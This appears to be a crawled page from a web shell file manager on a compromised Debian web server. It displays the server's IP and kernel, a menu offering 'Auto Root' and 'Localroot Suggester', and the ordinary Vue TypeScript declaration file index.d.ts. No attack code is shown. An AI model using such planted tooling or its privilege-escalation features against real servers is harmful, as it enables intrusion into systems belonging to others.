Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
node_modules /
vue /
types /
Delete
Unzip
Name
Size
Permission
Date
Action
index.d.ts
600
B
-rw-r--r--
2022-04-21 14:30
options.d.ts
6.99
KB
-rw-r--r--
2022-04-21 14:30
plugin.d.ts
201
B
-rw-r--r--
2022-04-21 14:30
umd.d.ts
2.1
KB
-rw-r--r--
2022-04-21 14:30
vnode.d.ts
2.08
KB
-rw-r--r--
2022-04-21 14:30
vue.d.ts
6.55
KB
-rw-r--r--
2022-04-21 14:30
Save
Rename
import * as V from "./index"; import { DefaultData, DefaultProps, DefaultMethods, DefaultComputed, PropsDefinition } from "./options"; // Expose some types for backward compatibility... declare namespace Vue { // vue.d.ts export type CreateElement = V.CreateElement; export type VueConstructor<V extends Vue = Vue> = V.VueConstructor<V>; // options.d.ts export type Component<Data=DefaultData<never>, Methods=DefaultMethods<never>, Computed=DefaultComputed, Props=DefaultProps> = V.Component<Data, Methods, Computed, Props>; export type AsyncComponent<Data=DefaultData<never>, Methods=DefaultMethods<never>, Computed=DefaultComputed, Props=DefaultProps> = V.AsyncComponent<Data, Methods, Computed, Props>; export type ComponentOptions<V extends Vue, Data=DefaultData<V>, Methods=DefaultMethods<V>, Computed=DefaultComputed, PropsDef=PropsDefinition<DefaultProps>, Props=DefaultProps> = V.ComponentOptions<V, Data, Methods, Computed, PropsDef, Props>; export type FunctionalComponentOptions<Props = DefaultProps, PropDefs = PropsDefinition<Props>> = V.FunctionalComponentOptions<Props, PropDefs>; export type RenderContext<Props=DefaultProps> = V.RenderContext<Props>; export type PropType<T> = V.PropType<T>; export type PropOptions<T=any> = V.PropOptions<T>; export type ComputedOptions<T> = V.ComputedOptions<T>; export type WatchHandler<T> = V.WatchHandler<T>; export type WatchOptions = V.WatchOptions; export type WatchOptionsWithHandler<T> = V.WatchOptionsWithHandler<T>; export type DirectiveFunction = V.DirectiveFunction; export type DirectiveOptions = V.DirectiveOptions; // plugin.d.ts export type PluginFunction<T> = V.PluginFunction<T>; export type PluginObject<T> = V.PluginObject<T>; // vnode.d.ts export type VNodeChildren = V.VNodeChildren; export type VNodeChildrenArrayContents = V.VNodeChildrenArrayContents; export type VNode = V.VNode; export type VNodeComponentOptions = V.VNodeComponentOptions; export type VNodeData = V.VNodeData; export type VNodeDirective = V.VNodeDirective; } declare class Vue extends V.default {} export = Vue; export as namespace Vue;